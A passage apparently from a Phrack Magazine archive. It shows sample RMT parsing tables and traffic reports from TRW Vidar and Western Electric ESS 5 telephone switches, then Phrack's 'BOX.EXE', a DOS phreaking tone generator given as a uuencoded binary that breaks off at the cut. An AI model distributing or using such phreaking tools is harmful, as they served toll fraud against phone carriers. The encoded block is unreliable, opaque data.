  15740. 001     000      /COMPLETION/   000     084     255     65535    65535
  15741. 002     000      /ROW/          001     077     001     00100    02039
  15742. 003     001      /END OF TMR/   000     073     255     65535    65535
  15743. 004     001      /***/          002     073     255     65535    65535
  15744. 005     002      /^M/           001     066     001     65535    65535
  15745.  
  15746.  
  15747. Example of a TRAFFIC report
  15748. ~~~~~~~~~~~~~~~~~~~~~~~~~~
  15749.  
  15750. SITE:ACD,INC.           GROUP: 1                BUFFER:ACTIVE
  15751. COLLECTION TIME: 08:00:00       05/01/79
  15752. COMPLETION TIME: 08:01:05       05/01/79
  15753.  
  15754. ROW     ODD3S   ODTNP
  15755. 0       1       2
  15756. 1
  15757.         OLOSZ   OLMAT   ORVEC
  15758. 2       3       2       1
  15759.         OLOTB   OLOTL   OLOTP   OLMDS   OLMBY
  15760. 3       7       2       1       8       3
  15761.  
  15762. 4
  15763.  
  15764. 5
  15765.  
  15766. ...
  15767. .
  15768. .
  15769. .
  15770. .
  15771.  
  15772.  
  15773. ***********************************************************************
  15774. -------------- TRW Vidar ITS 4/5 and ITS 5 Switches -------------------
  15775. ***********************************************************************
  15776.  
  15777.  
  15778.  
  15779. Example of RMT data
  15780. ~~~~~~~~~~~~~~~~~~
  15781.  
  15782.  
  15783. ACTION IN LINE 006              VARIABLE LOWER: 00000 UPPER: 00837
  15784.  
  15785. ENTRY   REQUIRED   STRING       NEW     ACTION  TYPE    STARTING  ENDING
  15786.         PHASE                   PHASE                   REGISTER  REGISTER
  15787. ---------------------------------------------------------------------------
  15788. 001     000     /ITD REPORT/    000     073     255     65535     65535
  15789. 002     000     / TO /          000     072     001     65535     65535
  15790. 003     000     /SYSTEM/        000     078     002     65535     65535
  15791. 004     000     /GRADE/         000     078     004     65535     65535
  15792. 005     000     /SEPAR/         000     073     004     65535     65535
  15793. 006     000     /END/           000     004     255     65535     65535
  15794.  
  15795.  
  15796. Example of TRAFFIC report
  15797. ~~~~~~~~~~~~~~~~~~~~~~~~
  15798.  
  15799. TIMED  ITS REPORT   ADAM FROM 08-18-86  13:01:31 TO 08-18-86 14:00:28
  15800. CLEARING COUNTERS
  15801.  
  15802. GROUP TOTALS
  15803.  
  15804.         NAME    TYPE    ATT     COM     XCS     AVH     OFL
  15805.  
  15806.         LSSO    ORIG    131     93      1671    13      0
  15807.         LSSO    TERM    129     98      1729    13      0
  15808.         LSS1    ORIG    159     111     3093    19      0
  15809.         LSS1    TERM    114     97      2793    25      0
  15810.         LSS2    ORIG
  15811.         .
  15812.         .
  15813.         .
  15814.         .
  15815.  
  15816.  
  15817. *********************************************************************
  15818. ------------- Western Electric ESS 5 Switch -------------------------
  15819. *********************************************************************
  15820.  
  15821. Example of RMT data
  15822. ~~~~~~~~~~~~~~~~~~
  15823.  
  15824. ACTION IN LINE 003                      VARIABLE LOWER: 00000 UPPPER: 00100
  15825.  
  15826. ENTRY   REQUIRED   STRING       NEW     ACTION  TYPE    STARTING ENDING
  15827.         PHASE                   PHASE                   REGISTER REGISTER
  15828. ----------------------------------------------------------------------------
  15829. 001     000     /S570/          001     075     255     65535    65535
  15830. 002     001     /TION 1:/       002     078     001     65535    65535
  15831. 003     002     /TION 3:/       003     078     002     65535    65535
  15832.  
  15833. Example of TRAFFIC report
  15834. ~~~~~~~~~~~~~~~~~~~~~~~~
  15835.  
  15836. S570-108396613 86-05-13  12:01:22  12430
  15837. OP TRFC30 VLD
  15838.   TIME: 12:0:27
  15839.  
  15840. SECTION 1: VALIDITY
  15841.  
  15842. PROC    DATLOS  SCN10   SCN100
  15843. 0       VALID   0       18
  15844. 7       VALID   180     18
  15845. 10      VALID   180     19
  15846. 9       VALID   180     18
  15847. 2       VALID   180     18
  15848. 6       VALID   180     18
  15849. 4       VALID   180     18
  15850. 3       VALID   180     18
  15851. 8       VALID   180     18
  15852. 5       VALID   180     18
  15853. 1       VALID   180     18
  15854. 11      VALID   180     18
  15855.  
  15856.  
  15857. S570-108396613  86-05-13 12:01:24  12431
  15858. OP TRFC30 OFC
  15859.   TIME 12:0:27
  15860.  
  15861. SECTION 3: OFFICE TOTALS
  15862.  
  15863. DPORQ =   46    TTPRQ =  693  DPINRQ =  1226
  15864. MFINRQ=   9577  CDIRR =  58   TCBUSY =  11
  15865.  .
  15866.  .
  15867.  .
  15868.  .
  15869.  .
  15870.  
  15871.  
  15872.  
  15873. ----------------------------------------------------------------------------
  15874.                               ==Phrack Magazine==
  15875.  
  15876.                  Volume Five, Issue Forty-Five, File 22 of 28
  15877.  
  15878. ****************************************************************************
  15879.  
  15880. BOX.EXE - Submitted to Phrack Magazine for your amusement.
  15881.  
  15882. by The Fixer / 604
  15883.  
  15884. This is a tiny, minimalist demonstration of several types of box tones.
  15885. No cosmetic bullshit, no command line parameters and no config files.
  15886.  
  15887. You just type BOX.
  15888.  
  15889. The only requirements for this program are an IBM PC or compatible and
  15890. an Adlib Music Card or one of its many successors (including all Sound
  15891. Blaster types).  You may need to turn the volume up a bit as the pure
  15892. sinewaves tend to be quieter than other Adlib waveforms.
  15893.  
  15894. There are keystroke menus in the program.  If you need more help than
  15895. that, you shouldn't be running it.
  15896.  
  15897. -=( The Fixer of 604 )=-
  15898.  
  15899. begin 644 box.exe
  15900. M35J'`1$````"`"L'*Z>@`X`````2`-D!'````$Q:,#G__U6)Y3'`FLT"D`*#
  15901. M?@0`=7_X!YJE#B<!ZTKS!@!^$_^`L`%0_W8&FHT-[0=(]9J_!OCG"+'`YP+G
  15902. M".?\]?#3Y_`$FJ@"+@+7`-*`!^C\^%W"MO?_F[@"`)K\[`**1@0\.W4&QN'\
  15903. M1OZ7&#P\]@+K#OD8/#WV`^L$^O^.!]O^B$;Z_XGLOOC_Q!A";'5E(&)O>"!S
  15904. M:?__;75L871O<B!M;V1E.B<@(,!M,?W_,OC]-/C]-_ZC^E-4,U`H1"G8;5__
  15905. M_C/X_37X_3C8_5`@*%38^`N;`__^-OC].?I+V=2&V$O8^!/__C"P_3*("GA0
  15906. MV/@;__S8L%,I(OS#]4AI="!Y;W4F<V.(<&%C$F'V9H?G&#(V,*U#4%,FWT`?
  15907. M1AGK4VEL=F4@T/G_1C'P4O_I960O1W)E96X@)MI2(`\/=&\@<&CO86L@81]/
  15908. ML'1R:6YGTT530X/_YW%UW0?P";^<!1Y7FMVP'P7VFI'Q_K^G``Y7'K7@4)IP
  15909. M!NGD^`W5^`_`NZW5^!F_Z.3X&A`!Y/@9..3X&F#D^!EMO]7X#XBY^!JKY/@:
  15910. MTN3X%%W#+$L]&R$`\5,]2_%4^_50AACZ,OE$^3/V__DA/53S+#UP875S911%
  15911. M;K;==%WQ4'KT4WSS.O7B!`&(\X%T@>SWF\KB0O@4+@/;\!?X*%O5^`O^Y/@)
  15912. M!.2-O@`?4O\65[C_`.(UXIV'_^+^BH;G,.2)AOS^N`'QPP`[^7X#Z94!\/['
  15913. M8?[K!/_ZB[[\BH.`X=S(^PK2/#$/'W42_S8$\38"`+AD_BFSZ,3[Z5$!/#+J
  15914. M"#:$Z@;J_*[J.^H4&S/J#.H*ZOR80HKJ)>HTZA`-(>H.ZOR"Z@_J-<6&ZA3J
  15915. M$NK\;.JGV/D`/#;J&.H6ZOP04E;JX^HWZAQL".H:ZOQ`ZLTI-NHXZB#J'NK\
  15916. M*H04ZK?J.>HD&T+J(NK\%.JAZC"*?>HHZB;J_/[ZZ8LXQ.I+=1'N-.H0?S+J
  15917. MR.KH^NMV/%.*#>L\ZSK5_-.GV.MA/%3K,.LNZ_QPBK[K3#Q0ZS@-I^LVZ_RI
  15918. MZS<\1.O8<"SK*NO\E.LB/"&*8>M`ZS[KT`<(_^M_ZPT\+'4)N(0NU0/W[+A+
  15919. M6/'WBW[Q:_+OW70#Z7'^#/`.Z$'\Z='#'/O=MAHBZ-$BY]`/"^C2[=$2V4'4
  15920. MH/3LT1'9-ME"].C1AH8-V3+90_0J4=LC_2V01"&`V"`E@=NJ[&3=<=/_@=@0
  15921. M%R/8"Y#8*;P%%.@H;KO9U?@9O^7D^!KQY/@:_8'X*0D&[;6Y^!DKY/@:4>3X
  15922. M%%W#'<3P"2#($AV_,J7R(%1O;F5SJ_;4_.U4X>(M__[B_N___R(@X>51+O]1
  15923. M=6%R>-K_>/A#[T-O:<%C;VQL'X-E8W0A($3N1(Q4^#+T_U+=_IET=7)NXV\>
  15924. M($[O3FEC:V5LWOU"[&#O4C/98F'KRN@@(76[RN@4.\@+SN@V@@=-\"B@U?@9
  15925. MO[[M=N3X&MSD^!K_Y/@:(0AE^"A`U?@9OV&[_N3X&H/D^!1=PZ#+E;8$Z!CX
  15926. MFO_Q"`,N`@C`=/>:&O>(1GK#_J:Q+M4`=2/K_?WK_7_>4.A7]CS_=`WU3/:"
  15927. ML=\WZ7@!Z7(!!]`0R_7I7`?0$;4T-.I&!]`1G^HP!]`1B30$ZAH'T!%SZ@3J
  15928. M0T,'T`]=ZNX'T!%'ZMA#0P?0$3'JP@?0$1OJK$/1!]`1!>J6!]+J!]`*!]_O
  15929. M].F`Z@;0#]GTZVL&T!#0T,3K5@;0$*_K00;0$'##FNLL/"`&T`Z%ZQ>_WSQ2
  15930. M=07H[/<$J1MT!#Q1`*I?W?\`ZP/I2EOQ!ZHR\`^Z^C+P*MTWB?0R]W[T,O*$
  15931. M`>E^,O5(AOAX1GAN8_WSZ<:&:#+U3.I*ZOSGZL:&4C+U4.I.ZOS1ZL:&/#+U
  15932. M5.I2ZOR[ZL:&)C+U6.I6ZOREZL:&$#+U7.I:ZOR/ZL:&^C+U8.I>ZOQYZL:&
  15933. MY#+U9.IBZOQCZL:&SC+U:.IFZOQ-ZL:&N#+U;.IJZOPWZI!BHNHJZG3J<D-H
  15934. MZOPAZHSJ(X;R<`3^ZNWJ"_/K=RGV/$'K>.MVZ_SV\J?8ZV(\0NM\ZWKK_'"*
  15935. MX>M-/$/K@`V-ZW[K_,SK.!WTA`T-ZX+K_+?K(QWP$**V[^LF\`\^)O`+!B;V
  15936. M!N@2^R;P*J_NQ_(F]Z3R)O(N`>DH`9J/`3K'1OH!F?_Y8HA[1'="=R&3OV(9
  15937. M\OFINX-^^@1UWQ\+XO@,^_'IZ@`N*NK_,+']ZN7Q^<PAU.CX#,W2O-).EO+J
  15938. M^`H0;K?JINI#=2EPYUH,H.JAO$.\_GNMU-WH`V7I\>MY!.G3^`UTT_@+%&IM
  15939. MY=-<TTQF\=/X#4>ET-/X"Y7ETR_3'WCP$'#[&NL*/!M\]Y1\]C54:/\5:7,@
  15940. M<')O9W)A;1')B\G@W_OO86X@061L:6+<P8=_;7!A=/=L92!S;W5N9'C_[V%R
  15941. M9"YIR`F:`P$G`0B[.,!U,B;0%/P.7M`3Q18!#H?TU0#%FH@)^X]CH/`!4+`U
  15942. MSP3T\5L*]/@*\O3X"O/T^`K0"F5)]%^,@=#T_M#T_I+"T/3^T`_T+TJ2!=#]
  15943. M]/[0]/[05EGT_J#]E]#^]/Z@_?2@_;;*]$#]]]#^]/Y`_9*E]$#]].!Z0>!]
  15944. M^+__7<,`%U+Z0@:Y,"XY.2!B>?\;(%1H92!&:7AE<BSNN_H=^N]9\6AA_&('
  15945. MNF$@4P9_95WR;,Y%\61U8W1I;QCU\?HQUY64%8IL:7J/=C;Q.[DG.34FJ49X
  15946. M4L<_X38P-/I-0TU80TE6'!KV4PT*_E`:N70"!XQFN<ASQX"']XA:;V]M@(_P
  15947. M+B!9;W6'M2!53I\?3%I%6$4Z[FUU<W1_.'0@,TQI5#/;0GET0+KTT2ZQF@``
  15948. MA_HC\0T`+OOGMW$]N`Z_@Q!WHPY7FN;TOVD#Y;@;A-/_P[_H$>A^_>@9^*+7
  15949. M`*#]H@#6UOK]X-E527.Z^!1:_YRZ^!3D_,GD^!1=[>LI/`%U"./CZ*WWE.L=
  15950. M/`+T;W2<^?01/`/T/?L.'O0%Q@;ZVKG_O_L/KK2_V`"JEHO?!W.Y]1^W_0#_
  15951. M^`LNR`VAA`2)1OZAAO__^ORZB`.*1@CNBT[^[.+]<(A"]0;N2O3\!NOT5>'*
  15952. MS<?X&HK'^!]\]8#_AS[9`0!T&(N.!@#1Z?[_?U#D0200.L1T^(K@XO18ZQ*"
  15953. M`NCL8>SX"L&(W4-$:`U;[&34).!@;P*JR]SX#9)E>](]T_]7".D.Z)$`@7[^
  15954. M_P!UZ]+^-O@)#W$3:0"P!-E@V>'^BL/V@/;7_OR$.N;_#]'9X;#_[\;E^#0A
  15955. M]KS^N`JL)O_$]OQAW?S"_J/"_YG^0WB`?OV2!OK\P'0$J"Y^ZVIA2OQ,^`T`
  15956. M`G=]W+_WBE8&N_$PY(OXB)4<Q56P\E"W\;5._H'P"='X%RYA*_S1_EC1^`KN
  15957. M\`EX!@!T,;`0-P5B`=RS_W?4_CL#=.S\J`#U$PP_]3T`T?\(=>'K+U%;SQ:"
  15958. MS_@2=\_X"0S/_9+/AE#P#UL%P``A/`@&];EET^`E,*(P\$`">4"*A;R"$23/
  15959. MBM#Q_0+\IKD6XO@*"B;.)O@4H/@D`J#X#6WMRZ#X"P*@_)W&\!E'RB#I4O](
  15960. MD``$PM$_11K1$?@1?*K;`>O8:2!I_#/X#`P@PP+#^#=8QQ##Q:CCP_@Q)._#
  15961. MZFV(P_@6M>O#^`T&)`]:\`[P6O`A*&VUTM@*H/@70%+P"092\D+RF/@,/Q5L
  15962. MF/@AP']RF/@FL*#X#L"@^"%@VZZ@^")@BN@.\#CX#P^8^"'X^YCX*6U=</`S
  15963. MF*#X(H`X^$(PF/@J./@ST/J@^!7<_4L%L)G@%YOZZN7&A7H$.K8@RN`8O_@4
  15964. M)-^_6K_X"P!J=K_X&8#=?O@-VM(92<OX*23^W/K+Y/G+^#+>R_@6X=`-T>`E
  15965. M-FL.(O`/X8+P(5*CA-`?H_@1`JW?H_@-A]`5)*/X"=B]L+U0H-E^]-7&V/C6
  15966. MP^?X#3?:O^?X$_?GQL:FY_@3^^>-Y_@3_>=:*W3G^!.L\EOG_"_H&.!S];7W
  15967. MN+#ZM?`@!_BU\!/H`/]#8ZG#@/G\0*>Y"OP?C!7\9OQ)@<`-SZDVUNS$`XS#
  15968. M[.8!9\`)4\(Q2TW_YA+FS/]#S7W1YWON^9LBV?J-U,+BW/@3[]QV/-SX(B4J
  15969. MN/G<^!F4W)3<^!+$M>8$YE/]//_F^`Z6QE+F^!*H^`L/W&1@^![<0*E6W/@:
  15970. MN`>2XKCX'@62RMSX"6UMDO`).<'XE?/OH?@7X[(EN?`B`6UL6?@>[?*EN/@>
  15971. M`]R!-?@BS9(*3)3X&MRIW/@=<U'?@_??Y9?X%@K?^!*LN.GW7_S/\`SI%?N\
  15972. MU.GX$BZQ]=WH$^;WYOV]/;]ZG2&X"0`@B^=2<;\$`C;5[QCO^`IDWA;O^`G.
  15973. MF!'_?XM&!KL``$/1Z'7[@^L%B%X5_UREL=79:`G8,=*)1OJ)_3]6_/;<T+@4
  15974. M`"O"F8O(B]H,^^3ZB^F:HH>1N33"5S\QVYK9*Y'4_.7\)?\#@>((>IIDF?"4
  15975. MJ`JB^`G_=@8H\RAEKID:\G_@P_^=C-W1YXN%)0..CL*/D8I6W@.E6@2^&Z7=
  15976. M_XF52`1T\[D*-L$#4"#5?^.:L_D[2';<>K'J%@#)[?X+Q\ED!!J0$]\*!*!P
  15977. M[_>+7@B(7M^,_^ZY!0`8E/SN$Q5*N1[TV;`@F3\`V8;[`EX&U.W9#VOVT`K^
  15978. M^M8Z1OUT&LCJXLSMXOW8T7;2853C\7H&X]`.`_`-/]@(;'OV]1WBQ?7X"8*+
  15979. MZA%UUGV`(/4PU<<&A`2N^G\\A@0D`,8&W`'[W0$!#`_[W@&G!M\!`X<]^^`!
  15980. M!/OA`;6!X@$('`[[XP$)^^0!"H?#^^4!"_OF`0S[Y^%P`0W[Z`$0^^D!$3@<
  15981. M^^H!$OOK`1,.A_OL`13[[0$5^Y12[KKOIO"U\3JDH?(!!OOSG'1(]+#U`0?[
  15982. M]BFEJ_>7^*;YDI32^J;[G/RA_2%]`0[[_IS_`0^_'.OJ,.H`/W0PZQP#[_@.
  15983. M_>`Q^LO:X/_QGV^!OO__CL8F@#X.5T<`^W0:\_@)'EGS^`G^=2W`V]0C@P0`
  15984. M_8'PUU$P#"+XAO#\-?D=`^O8"UD$_OF@_0[PIYKVS/<)=>U=/UW+-?/_`'A[
  15985. MBU/H*`"_G,*\<MH@`_>:9$(4>W'Q<^T-[6AV_O_$M`_HU`4\!W0*/`-V!KB'
  15986. M'P,`Z%7]GP"T"#+__O]_!8K$)'^BF`2BC@0SP*(0_HGXF?V:!$"BB`3#_XX&
  15987. MR)YL`":*'28Z'73X__OXN.3_F>@\`O?0]](__+DW`/?QHY2)#A^Z.`$_P;@;
  15988. M)<TA'\/.&B:`WX<:DP8\!'("GMGP?[245P58"N1T+;@2$;/XA_-*!;@P$;<`
  15989. MLO8_!$`%@/HJ=1;.#LZ`_[W]N0`&Z"P%M!(?;[,@Z"4%PTL?!5#4_A3XA[VQ
  15990. M``K2=0BR&#O_X7<"L0&*\HK4_LJC@/[_OQAV`K0!HXP$B1:6!(@.BX?QP^F*
  15991. M!`$THY#ND@3_8<-0'KA"`X[8@#XN`'3A`8/Q(P$?6,_QGL+X`'4!P_``P<T`
  15992. M\!90M/KK]+#__U[H'0.P0^@8`^@.`^F)_HO_5]PVBT<$Z"/_Z&W_H-GS,]D\
  15993. M#.N*5PK\=PC#__Q/!OQO!#K1=R<Z]7?P/R-M>!_^SG@;_LDZ#OPA<7<3_LTZ
  15994. M+I?X"V#X=7$.<>A!`\H!P@@`$UP^MHL01P[KBUSH-OF`[_4*`\OH&@/C_LKT
  15995. MAXKE&P3+N`$'Z^J=X@$&'3D"6.6*R(KT#^[&.NYU`C+`Z/:,0\=M=7<$?0(\
  15996. M#K-R%SK@=Q&'!W,"-I'R"3HVD_+8/RS"`F39Z+4"BL(J!@PAV_[`CZGTQ@`2
  15997. M]-WTO/P/%*CP=`0D#PR`@"87?I9P"`8/_^8D![$$TN`J/>B/Z/WT]\N`#BQ]
  15998. M^@C+XO2[BT\$XQ/W?_/J,__*Z:&4!#/2Z`4`XO;\=\\M`0"#V@!R!:WJ\\/Z
  15999. M_]1?!+C=-+H2`#O3<QJ___?SB]CD8:AJ80P#YF&PMN8_H$.*P^9"BL?\Q0&V
  16000. M+VG\ZY,^F4;Q"!=@3/*P`'3P:8?OQ@;\`>L*P'42,N3I#_?X"H@F[PKD=7_I
  16001. MZ!/XA_YL'C;%?P3'1?#PX=?[!(``C87\B46'_PR,70[Q$&<#C$T2QD7K_S``
  16002. M'^3QU?VXGP.[?02+RX$?'WT"L==T"L:RU[A,0GCOV,H4TA:)71AX./H:B4T<
  16003. M^AXSP/T_R%6+[,1^!B:+501*2L#/^F`FQ'T,,]L?_F@.Z%S_N0@\"'0T/!._
  16004. M_W0P/`1T1$FR,2<\`70C/`;__W0W/!IT1CP-=$\\('+/.]K__W3+)H@!0^B8
  16005. M`#O>=L"+\^O_'[P+VW2XL`CHAP"P(.B"X`_[]GT`2^+JZZ0?_^!TH":*`<J9
  16006. MZ&H`0^+?]._KD8`^B1OIBK_K"NC_"$X`)L<!#0I#0V<!H%LF1FM("@8(8\J(
  16007. M\<0<64UA@NXI_.,94\2&_XJH\0NN!>@<`$?B]^L_(`/HG`#HUOS&SS^\^[`-
  16008. MZ`+["E-14C?&=>ER`%@;X2HK+43_IS,\"G0UM`F*'HX$,A2_]U+H8P%:_L)]
  16009. MZG8@BG'IZQ<_P+0.Z$\!ZQ/M\W0'@@W^RNO3Z9OPWPB;+0`'6EE;P_[&6^H'
  16010. M#788_LZ>$>G>X`P4#Q^Q6<.T`Z/I"@&T`H?A^0,!E![(-A90C1@`'\RY]TAP
  16011. M(1/N<"QT;#E'?_T\87[H;IRA_Y`LZ&(`#,.B!W/"`*[KYW@<Z%,`;A-N#^A&
  16012. M^%/8>?_K!^@^`--'@,^JIN*FZ#``\7^5B96*QO8F2@`R]@/"_S!6N19C`+`.
  16013. M[NOKQ4*>POI*L`_TP?0?#W_#._=T8YI7'@:+SRO.GO_#BL?'_P/#T>"+],/X
  16014. MQ8/"!H`^208?/YRAS@!U`Z',W1Z+!/[_#`8?CL#\"MMT%JR*V.RHQ_\!=?OZ
  16015. M^G3[B\.K^^+L?^CK!HKGK*OB_,E?[_%6__=750;-$`==7U[#`+H:V=J,__\&
  16016. MO``S[>@`"^B@`(O$!1,`'_ZQ!-/HC-)1HXX`HY``0P@#!HCYDOV<\'C]X*.H
  16017. M`([1)J$"Z-_UI"C!K@#6`(P.L*K)#_\&OCD"N<20_"ZLM#7-_ULAB1V,10*#
  16018. MQP3B[Q+2#%71A_02T;H3^"/XVP"X%-HD^`3P/_K*N'3)\#I0_KAC`@Z*4FZ1
  16019. MR`(T_NP%[/@*.NRY`LLSP/__G%N`YP]3G9Q9@.7P@/WP=.]?#D"`S_#P_70!
  16020. M0*+0`,.'Z?C_8?N#Q`98@^<?@<>6`/_#@/PY<P.___]7M%23B_]_[(!.%@%8
  16021. M6UE:7E]='P?/N$!_SM73T<@`65OK!]__T,$SR3/;YO/[H[8`B\$+P_]#=#VA
  16022. ME``+P'0OCL`&$/K_]ALKPW<7]]@]`!!S$/#_NN[WX@/!<@<F.P8(`.'_<@;=
  16023. M%`#KT8O(C,,K'O#PO*3K$(D.`HD>NC\6`,0>L@",P+$3ELF&AO6CM/W`OQ$!
  16024. M(`N%!E/+_?,<*@C\]_HZ(6G!K/`+)1[%%=;QK?+PH0P?L`L&L'0INTP"A@_.
  16025. M`*%:Z#(`NUL!OO0>].GH0`"P.CB$4<':Z#7I8.DT/`?=M$S!+HH'"OR/0P;H
  16026. M.`!#Z_/#L63['^:Q"E_AZP0RY/;Q!#!0/PR^6(K$PU#\Z`$]#/901='HZ`/W
  16027. M)`__P^0\.G("!`>*T+0&N,/__P`"&R$C)#0U-C<X.3H[/#W__SX_=5)U;G1I
  16028. M;64@97)R;W(/#B``(&%T^^HI`%#^#_)<*G,@0V]P>7)I9VC_'^@H8RD@,3DX
  16029. M,RPY,B!"_C_A;&%N9#/`AP;``,N#/CC\^YW!RZ'YZ7#^B_3_AS:.1`(F.U4"
  16030. M?P=\%/CC`05R#_,&?`CQ#L/X101WV+C)V$C#X?ZXU_I"_@5K<@W_8RO$<PGW
  16031. MV#L&O@!RXLKX_N@J_KHSTE_2Q'\(-L5].'<$9-FKN+#7_(``J\+']?^-172K
  16032. MC.QA_-P)_)`"[+D.`//__ZNY3P`+TG4)K#K(=@2*R./]UPBLR/$#JN+X,L"J
  16033. M'W/!\],:8PH:PMW1!/@&^`QT__C1T44.Q]9%"LH*`+H?WK'7ZPBZLOL#NK/7
  16034. M#M8['$4"/=W)$CWI=`T]CK]R=!#'`F8`ZR12!B?P=K$E`%J]";G^NQ!;U0#H
  16035. M3/5!)G++<M(I/+']C\R$*1CXKPBT9SP<X!A0NQ3)%0!8#R!%#+L<]73`^`G`
  16036. M[9G^)O\9->D#>^E?"M<'J<'=\C'%50P<T1C1/R$=M#_-(7(0@7.`",<+%,OV
  16037. MT!>XH^[0^`HSR2:'ZLGC8<Y`S@<KP:RX9:W_Y\?;^!0"_\2LSAV#^P1V!K2B
  16038. M(3[F_.?X[#4N?P[A)G4NWG?%.W<_Q`IT*QX&4U*Q5US__U\*!P/:`_+\_]`K
  16039. M\HS"6P<`<!]6VS!U",-?.`#Z:`##4++1TN@S`=B;Y`C96+S^=;S#HOQ`0HBB
  16040. MLJ(YYD___WQ_""O/*]%S!`/*,](&)L3_!W<,`_ZP(/SSJBO^!Z8`../%5W4)
  16041. M4@[-K^(`KUKCZ<C!-I=IE['\2+']0;'X"L$&'+'(+TN.VD(XK5^M^Z^D*_O[
  16042. M&%.M_0U04E:KC8_UJUY:6$#`J?XC\EX&^_^XNP7VL>[^=0HF@W\:`'0#VW[H
  16043. M<``_\JQ2R0SZN1$[\W7S#,/;P_AT">L*P\%T`4Z/P[C0[\#]_\T"`+[4`(S:
  16044. MZ%C_O?@)+5K(O=_\[/P*._SE$O#FY6XF_U\4XNW#\O(/&/+^R0RX6`:+3K^'
  16045. M_7X(BU8*1]<AB\?$])?B*\=(JKV*8P]C"_"8JFK@\N,%T\,8'FG%"(H',N3A
  16046. M/[W&!BO0?@50Z&[^PO0'?8MVLT;HKG3__KR`/M`OX1MFP>`09L,4#ZS0^\'A
  16047. M]]F&__OWZ?BDPA#+B_"+^O\!]^%04HO&]^.+V'_^I?2+R%I8`],#T0^QPSX\
  16048. M)\/X$71>9IF_^6:+RF/XO/O+MU4S[0O_^])Y"$7WV(/2`/?:P[$^>0MP@$7Q
  16049. MV8/3\?/P83-)\8O[,]O,B]#XASN]$`#1X-'2T?___]-`*\X;WW,%2`/.$]]-
  16050. M=>GW?UWK%EVZR>FW^>/WDY+W\9/`\/W-T\?1[7.&%@BS_478!YG]75K]AP]C
  16051. MXA"F9M/JB\+A__7J<8/A'W0&T>K1V.(6\?K=^`_BW?@,>=W\B_N_W(S:(=ZL
  16052. MJHK(,NWSI([:0NPZ\>;\Z@KB!IZBK-]".L%V`HK!W/@)"MS]X`Q<_-@(BOC)
  16053. MV`8+R7_^"0-NL0/Q*\%R$T#&/KSN?0(SR3O!!HO!Z^?R7.&JB\B_"+__@2;A
  16054. MX8H-IJPF``4/)L;A@P7_E?;0`_E'D7Z_;_T`\1[%=@K\LM(LBM`R]O3_0MK-
  16055. M*\IR'$%'K/*N=17_.XO'B]F+RDGSIG0."[G+BQS^T4;KYH_K!$@K1@9%81]=
  16056. MCO]1P]J3BB4</Y\ZS"?,"LET!G[I)J9U`CK$8_X$L`'6**ITFJKHN5'^"K_L
  16057. M\2H8ZS;]!WEB(A*#'OYL`7T%QY,!`(V^`/_AH1976PH&5[CR4!TZ?FE(9<'+
  16058. M_NX.6-(#_U:QW_[?_<UIQ+GAK)'#0@GIW>P(]'A##_Z+Y4D,H?@*`'Y<<(#Z
  16059. M8WY6@?K-(21_3_D&^7Z-,"WYC?@0"(U8_I;X"M98[`,Q29+\/I)[DORS_N_\
  16060. M"9%=RFN;,\F)#;C]&``]W<P-L`+_!?6S_M_U`K0\@'TP`'0)C54PB=%_]UJ)
  16061. M!;@+!+J0&_$SV]/\+XL0/AW'1.3VPH"X8#G[Y9=B=13!U]DK`+CJ?SO/_A6;
  16062. M&IF)51:)31B)71K8Z.\<@,61'N$7TS.`P]+9L0)"L2U6"8`RDG/&>6C!KN&:
  16063. MAV#IC97HN?V)S'.$C\FJ.]AT((#_7^P:=`-#Z_*+TRO0N?__NOU2_[&VRDC)
  16064. M'>@-_#OW<P<#_UKQ`_E.3_WSI/P<Z_OK""?J%?_ZZBS1/L3T/&%R!CQZ]_]W
  16065. M`BP@Y>F_U@`>![GH!BO/`?[1Z8#9J\,``+P"80"$`_Q,!/K\&`#X%`7X_``B
  16066. M]OSTW/0``/ST_/+``/SPI`;P``#\\/SP`(7\[OPHU\'Z'X:8"+D"N03\.`7\
  16067. M!P#%!0(#]/ST@`C\]%3T`!#\]/STK8%H^/SXU&$&``#@_.C\&%SP5@:Z__@/
  16068. M___L^!&'!O_X&A!`_*#-N;CY4`$:;;'__P#P`````````````````$\1````
  16069. M0+$#V0&)`=<#B%,```8.'XL.#`"+\4Z)]XS;`QX*`([#M``Q[?VL`<6JXOJ+
  16070. M%@X`BL(IQ8K&*<4YU70,NI$!M`G-(;C_3,TA4[A3`%#++HLN"`",VHGH/0`0
  16071. M=@.X`!`IQ2G"*<..VH[#L0/3X(G!T>!(2(OPB_CSI0GM==C\CL*.VS'V,?^Z
  16072. M$`"MB<71[4IU!:V)Q;(0<P.DZ_$QR='M2G4%K8G%LA!R(M'M2G4%K8G%LA#1
  16073. MT='M2G4%K8G%LA#1T4%!K+?_BMCI$P"MB]BQ`]+O@,_@@.0'=`R(X4%!)HH!
  16074. MJN+ZZZ:L",!T0#P!=`6(P4'KZHG[@^</@<<`(+$$T^N,P`'8+0`"CL")\X/F
  16075. M#]/KC-@!V([8Z7+_*D9A8G)I8V4@0D5,3$%21"H.'[Z=`5N#PQ`QTJV)P>,3
  16076. MB\(!V([`K8OX@___=!$F`1WB\X'Z`/!T%H'"`!#KW(S`0([`@^\0)@$=2([`
  16077. MZ^*+PXL^!`"+-@8``<8!!@(`+1``CMB.P#';^H[6B^?[+O\O0U)#($5R<F]R
  16078. M#0HD#0$(`!,`)@`N`#\`1P!/`%<`7P!N``$""P(0`B(")P(L`C8".P)-`E("
  16079. M5P)I`FX"<P*%`HH"CP*A`J8"JP*]`L("QP+1`M8"Z`+M`O("!`,)`PX#(`,E
  16080. M`RH#>0.%`X\#E`.F`ZL#L`.Z`[\#T0/6`]L#[P/T`_D#)P2.!9<%K@6S!7$&
  16081. M>P:`!I(&EP:<!J8&JP:]!L(&QP;9!MX&XP;U!OH&_P81!Q8'&P<E!RH'/`=!
  16082. M!T8'6`==!V('=`=Y!WX'HPBM"+((Q`C)",X(V`C=".\(]`CY"`L)$`D5"2<)
  16083. M+`DQ"4,)2`E-"5\)9`EI"7,)>`F*"8\)E`FF":L)L`G""<<)S`G9">0)[0GY
  16084. M"0(*IPNR"[L+QPO0"X$-C`V5#:$-J@WN#2(.9@Z3#L`..@\_#TT/4@]D#VD/
  16085. M;@]U#WH/?P^+#Y</HP^O#[L/QP_3#]\/ZP_W#P,0#Q`;$"<0,Q`_$$L05Q!C
  16086. M$&\0=Q!_$%(15Q%<$681=1%_$801CA&3$:41JA&O$<H1U!'9$>L1\!'U$0<2
  16087. M#!(1$A@261)A$GD2LA+J$BH33A-\$P(4,11@%-H4.A6:%<D5!A9#%H`6X!9(
